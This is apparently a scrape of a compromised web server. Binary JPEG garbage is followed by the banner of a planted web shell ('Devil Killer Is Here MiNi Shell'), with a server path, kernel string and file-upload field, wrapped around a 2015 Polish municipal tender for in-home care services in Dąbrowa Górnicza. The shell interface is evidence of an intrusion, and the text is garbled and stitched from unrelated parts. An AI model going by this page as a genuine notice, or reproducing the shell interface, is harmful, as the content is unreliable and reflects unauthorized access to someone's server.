JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151105/297934-N-2015.html

<p class="kh_header"><b>Dąbrowa Górnicza: Świadczenie w miejscu zamieszkania usług  opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza</b><br>
<b>Numer ogłoszenia: 297934 - 2015; data zamieszczenia: 05.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Józefa Piłsudskiego 2, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 262 25 28, faks 32 261 36 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie w miejscu zamieszkania usług  opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: 
Świadczenie w miejscu zamieszkania usług  opiekuńczych dla osób wymagających pomocy w Gminie Dąbrowa Górnicza ZP/1 /53 U/MOPS/2015
Ww. usługi  świadczone są zgodnie z art.17, art. 50.1, art. 50.2, art. 50.3, art. 50.5  Ustawy 
z dnia 12 marca 2004r.  o pomocy społecznej (Dz. U.  z 2015r., poz. 163 z późn. zm.)
Przedmiot zamówienia obejmuje pomoc w zaspakajaniu codziennych potrzeb życiowych, opiekę higieniczną, zalecaną przez lekarza pielęgnację oraz w miarę możliwości  zapewnienie kontaktów z otoczeniem.

2. Do zadań Wykonawcy w zakresie usług opiekuńczych  w szczególności należy: 

 1) Świadczenie pomocy w zaspakajaniu codziennych potrzeb życiowych  w zakresie usług gospodarczych:
a)  Pomoc w zakupie odzieży i obuwia oraz zapewnienie artykułów spożywczych i artykułów 
     przemysłowych niezbędnych do egzystencji klienta,
b) Utrzymanie w czystości otoczenia klienta, w tym dokonywanie bieżących porządków 
      w używanej przez klienta części mieszkania,
c)  Pranie bielizny osobistej  oraz lekkiej odzieży klienta, oddawanie pościeli do pralni,
d) Zabezpieczenie posiłków, w tym co najmniej raz dziennie posiłku gorącego,
e) Utrzymanie w czystości termosów, naczyń stołowych  i kuchennych oraz  
      innego sprzętu gospodarczego służącego klientowi,
f) Palenie w piecu, przynoszenie węgla, wody,
g) Utrzymanie w czystości sprzętu sanitarnego i urządzeń sanitarnych,

2) Opieka higieniczna:
  a) Pomoc w czynnościach życia codziennego, w miarę potrzeby pomoc w ubieraniu, myciu 
    i kąpaniu, jedzeniu (karmienie, o ile stan zdrowia wymaga takiej czynności),  
  b) Pomoc przy załatwianiu potrzeb fizjologicznych, w tym zmiana pieluch, pieluchomajtek 
    i toaleta  w łóżku,
  c) Zmiana bielizny osobistej i pościelowej,
  d) Przesłanie łóżka,
  e) Zamawianie wizyt lekarskich, w razie konieczności wizyta u lekarza.

3) Zalecana przez lekarza pielęgnacja:
 a) Zapobieganie powstawania odleżyn i odparzeń,
 b) Przygotowanie leków wg zaleceń lekarskich.

4) Zapewnienie kontaktów z otoczeniem:
a) Pomoc w podtrzymywaniu kontaktów sąsiedzkich,
b) Uczestnictwo w spacerach na świeżym powietrzu, w tym pomoc w dotarciu  do ośrodka 
    wsparcia  i powrotu do domu ,
c) Terminowe załatwianie spraw urzędowych.

5) Rozliczenie środków finansowych klienta pozostających w dyspozycji osoby świadczącej usługi:
a)  Prowadzenie ewidencji wydatków i rozliczenia się z klientami  z wydanych pieniędzy,
b) Wnoszenie odpłatności (zgodnie z decyzją) od klienta  na rzecz którego świadczone są usługi opiekuńcze do kasy MOPS  do 15- go dnia każdego miesiąca po wykonanej usłudze. 

6) Wydatki związane z wypełnieniem zadań zawartych w pkt 1. lit. a-g (np. zakup art. spożywczych, gorącego posiłku, środków czystości, art. higienicznych, zapłata za pralnię ) ponoszone są ze środków finansowych klienta.

3.  Przewidywana maksymalna  ilość godzin miesięcznie  dla usług opiekuńczych 
wynosi: do 1765 godzin zegarowych w skali miesiąca, 
minimalnie  - 500  godzin zegarowych w skali miesiąca
w skali zamówienia  maksymalnie do 21180  godzin zegarowych.

4. Zamawiający zastrzega sobie prawo zmiany ilości godzin przedmiotu zamówienia  w zależności od  wysokości posiadanych środków  w roku  budżetowym  oraz  w zależności  od potrzeb wynikających  ze zmiennej ilości  osób kwalifikujących się do usług opiekuńczych.
5. Niewykorzystana ilość godzin w danym miesiącu może być przesunięta do wykorzystania w kolejnych miesiącach, jeżeli zaistnieje taka potrzeba na wyraźne zlecenie Zamawiającego.
6. Usługi opiekuńcze mogą być świadczone w dni robocze, w dni świąteczne  i wolne od pracy w miejscu zamieszkania  lub czasowego  pobytu osoby, której  przyznano pomoc w formie usług opiekuńczych.
7. Do świadczenia usług opiekuńczych Wykonawca zobowiązany jest    zatrudnić osoby sprawne fizycznie i intelektualnie, dbające o osobistą czystość i higienę, zdolne do wykonywania prac fizycznych, posiadające umiejętność utrzymywania kontaktów interpersonalnych.
8. Wykonawca zapewni świadczenie usług  opiekuńczych przez osoby odpowiednio przeszkolone  przez Wykonawcę w zakresie wykonywania usług objętych umową.
9. Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte niniejszym zamówieniem oraz prawidłowość wykonywanych przez nie czynności  i obowiązków  w powyższym zakresie. 
10.  Wykonawca wskaże Zamawiającemu numery telefonów kontaktowych,  numer faksu Wykonawcy i inne informacje oraz ustalenia niezbędne dla sprawnego i terminowego wykonania zamówienia. 
11. Zlecenie realizacji usług opiekuńczych na rzecz konkretnej osoby będzie przekazywane Wykonawcy na piśmie. Wykonawca otrzyma od pracownika MOPS kopię decyzji administracyjnej, zgodnie z którą obejmie klienta usługą w czasookresach i wymiarze godzin określonych w decyzji administracyjnej.   
12. Dopuszcza się maksymalnie jedną zmianę osoby świadczącej usługi w okresie obowiązywania decyzji przyznającej świadczenie. W sytuacjach szczególnie uzasadnionych sytuacją klienta  lub Wykonawcy  możliwa jest częstsza zmiana osoby świadczącej usługi  po wcześniejszym uzgodnieniu tej okoliczności z Zamawiającym. W przypadku zmiany osoby sprawującej usługi u danego klienta Wykonawca zobowiązany jest poinformować o tym Zamawiającego pisemnie lub faksem nie później niż 1 dzień przed objęciem usługi. Osoba zastępująca musi spełniać wymagania dla opiekuna określone w SIWZ. Brak niezwłocznej reakcji Zamawiającego co do wskazanej osoby uznaje się za akceptację w tym zakresie. 
13. Za datę rozpoczęcia świadczenia usług opiekuńczych na rzecz klientów uważa się datę określoną w decyzji administracyjnej. W szczególnych okolicznościach (np. powrót klienta ze szpitala, nagłe pogorszenie stanu zdrowia) dopuszcza się możliwość rozpoczęcia świadczenia usług przed wydaniem decyzji administracyjnej na wniosek  Zamawiającego, tj. zgłoszenie ustne, telefoniczne lub faksem. 
Decyzja w takim przypadku zostanie przekazana Wykonawcy niezwłocznie.
14. W wyjątkowych sytuacjach np. nagłe pogorszenie stanu zdrowia  dopuszcza się  możliwość ustnego, telefonicznego lub faksem zgłoszenia zmiany ilości godzin  świadczonych usług opiekuńczych określonych w decyzji administracyjnej, co następnie zostanie potwierdzone nową decyzją administracyjną dostarczoną niezwłocznie Wykonawcy.
15.  Wykonawca zobowiązany jest objąć klienta usługą opiekuńczą w sytuacjach nagłych, zgodnie z czasem reakcji zadeklarowanym  na druku oferty,  a w każdym innym przypadku  w terminie do 12 godzin od chwili zgłoszenia przez Zamawiającego. 
16. Za datę zakończenia świadczenia usług na rzecz klienta uważa się datę określoną w decyzji administracyjnej.
17. Zamawiający informuje Wykonawcę, iż opłata za usługi opiekuńcze  jest wnoszona przez osobę uzyskującą pomoc w formie usługi opiekuńczej  lub jej opiekuna prawnego, bezpośrednio przelewem na konto lub do kasy MOPS  w terminie do 15 dnia każdego miesiąca  następującego po miesiącu, w którym wykonano usługę. 
W przypadku wnoszenia opłaty przelewem:
  Nr   rachunku MOPS  61 1560 1010 2148 1236 9177 0002
18. Dopuszcza się, że odpłatność za świadczone usługi od klienta będzie dokonywał Wykonawca indywidualnie od każdego klienta do kasy  lub przelewem  na konto  MOPS na podstawie otrzymanego upoważnienia wystawionego przez klienta, który ma przyznane usługi w drodze decyzji administracyjnej. Kopię wpłaty KP Wykonawca dostarczy niezwłocznie klientowi.
19. Wykonawca zobowiązuje się współpracować z pracownikami socjalnymi oraz innymi upoważnionymi pracownikami MOPS. Przez współpracę rozumie się wymianę informacji dotyczącą  osób i  rodzin  objętych pomocą Ośrodka  i korzystających ze wsparcia w formie usług opiekuńczych. 
20. Wykonawca zobowiązany jest do przekazywania  Zamawiającemu rozliczenia  za każdy miesiąc świadczonych usług do 17  dnia następnego miesiąca w formie faktury/ rachunku  wraz  z zestawieniem przepracowanych godzin za każdy miesiąc zawierającym:
- imienny wykaz osób, na rzecz których świadczone były usługi opiekuńcze, 
- miesięczną liczbę  godzin usług faktycznie świadczonych,
- odpłatność  za miesiąc  faktycznie świadczonych  usług,  
- nazwisko osoby świadczącej usługi.
20.1. Wykonawca zobowiązany jest prowadzić karty pracy dokumentujące  czas i termin świadczonych usług z podpisem klienta lub członka rodziny potwierdzającym każdorazowo  wykonanie usługi i okazywać je na żądanie Zamawiającego.
21. Wykonawca w dniu podpisania umowy dostarczy Zamawiającemu wykaz osób, które będą świadczyć usługi opiekuńcze objęte umową. 
22. Wykonawca ponosi odpowiedzialność za szkody wyrządzone przez Wykonawcę, w tym  przez osoby, przy pomocy których Wykonawca realizuje zamówienie - osobom korzystającym z usług w związku ze świadczeniem usług objętych zamówieniem.  
23. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę w trakcie wykonywania zamówienia. 
24. W czasie trwania umowy Wykonawca jest zobowiązany do zatrudnienia wykwalifikowanego personelu stosownie do wykonywanej usługi.
25. Wykonawca zobowiązuje się do zachowania rzetelnej jakości świadczonych usług oraz ich terminowości.
26. Wykonawca zobowiązuje się do powiadomienia Zamawiającego o każdej zmianie sytuacji życiowej klienta, a także o pogorszeniu stanu zdrowia mających wpływ na realizację zadań wynikających z przedmiotu zamówienia. 
27. Wykonawca zobowiązany jest do posiadania opłaconej polisy OC lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50 000 zł przez cały okres trwania umowy.
28. Wykonawca zobowiązuje się do przestrzegania przez personel Wykonawcy pełnej tajemnicy służbowej w zakresie wykonywanych obowiązków oraz przestrzegania ochrony danych osobowych osób i rodziny, u których świadczone są usługi.
Wykonawca zobowiązuje się ponadto do przedsięwzięcia środków przewidzianych w przepisach art. 36-39a ustawy o ochronie danych osobowych w celach ochrony danych powierzonych mu do przetwarzania w związku z realizacja niniejszego zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0, 85.00.00.00-9, 85.31.11.00-3, 85.31.12.00-4, 85.31.13.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
Zamawiający żąda złożenia oświadczenia o spełnieniu wymagań określonych w art.22 ust.1  Ustawy  (załącznik nr 2 SIWZ)
Weryfikacja zostanie   przeprowadzona  wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku posiadania wiedzy i doświadczenia w zakresie realizacji przedmiotu zamówienia, jeżeli Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych  usług, w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tzn.  wykaże, że  wykonał w sposób należyty co najmniej jedno zamówienie świadczenia  usług opiekuńczych w ilości nie mniejszej niż 19 000 godzin zegarowych  maksymalnie w skali 12 miesięcy wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz  załączy dowody potwierdzające, że usługi zostały wykonane lub są wykonywane należycie, z uwzględnieniem zapisu rozdz.VII.1.2 
Weryfikacja zostanie przeprowadzona wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
Zamawiający żąda złożenia oświadczenia o spełnieniu wymagań określonych w art.22 ust.1 ustawy ( załącznik nr 2 do SIWZ).
Weryfikacja zostanie   przeprowadzona  wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku  nastąpi, jeżeli Wykonawca wykaże, że dysponuje co najmniej 18 osobami, które będą uczestniczyć w wykonaniu zamówienia i będą posiadały  co najmniej  szkolenie wewnętrzne zorganizowane przez Wykonawcę w zakresie objętym przedmiotem zamówienia lub ukończony kurs siostry PCK, lub kurs opiekunek osób starszych,  lub inne kwalifikacje  do świadczenia usług  opiekuńczych z uwzględnieniem zapisu rozdz.VII.1.3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie warunku w tym zakresie nastąpi poprzez udokumentowanie posiadania opłaconej polisy ubezpieczeniowej od odpowiedzialności cywilnej, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na  kwotę co najmniej  50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów  dotyczy tych usług, które pozwalają wykazać, że Wykonawca spełnia warunek określony w rozdz. VI.1.2. SIWZ. W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonywanych nienależycie, gdyż Zamawiający nie dokonuje oceny zdolności  Wykonawcy  do należytego wykonania zamówienia na podstawie art. 22 ust 5 Ustawy  Pzp;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty (Załącznik Nr 1 do SIWZ- wskazana data podpisania dokumentu).
2. Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w formie oryginału lub kopii poświadczonej przez notariusza. Pełnomocnictwo wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej).
3. W przypadku, gdy Wykonawca będzie polegał  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych  lub ekonomicznych innych podmiotów, niezależnie od charakteru  prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, że będzie  dysponował zasobami niezbędnymi do realizacji zamówienia, a w szczególności  przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres  korzystania z nich  przy wykonaniu zamówienia - zgodnie z art. 26 ust 2b Ustawy Pzp. Podmiot, który zobowiązał się do udostępnienia zasobów, o których mowa w ust. VII.4.3  odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego chyba, że za nie udostępnienie zasobów nie ponosi winy zgodnie z art. 26 ust. 2e ustawy Pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - czas reakcji objęcia klienta usługą opiekuńczą od chwili zgłoszenia  przez Zamawiającego w sytuacjach nagłych  (np. powrót ze szpitala) - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian  postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której  dokonano wyboru Wykonawcy, w przypadku:
Zmiany terminu wykonania zamówienia na skutek wystąpienia siły wyższej, czyli wydarzenia nieprzewidywalnego w chwili podpisywania umowy lub inne okoliczności niezależne od Zamawiającego, w tym takich, których Zamawiający  przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć np. nietypowe dla klimatu polskiego zjawiska bądź zdarzenia atmosferyczne lub inne. 
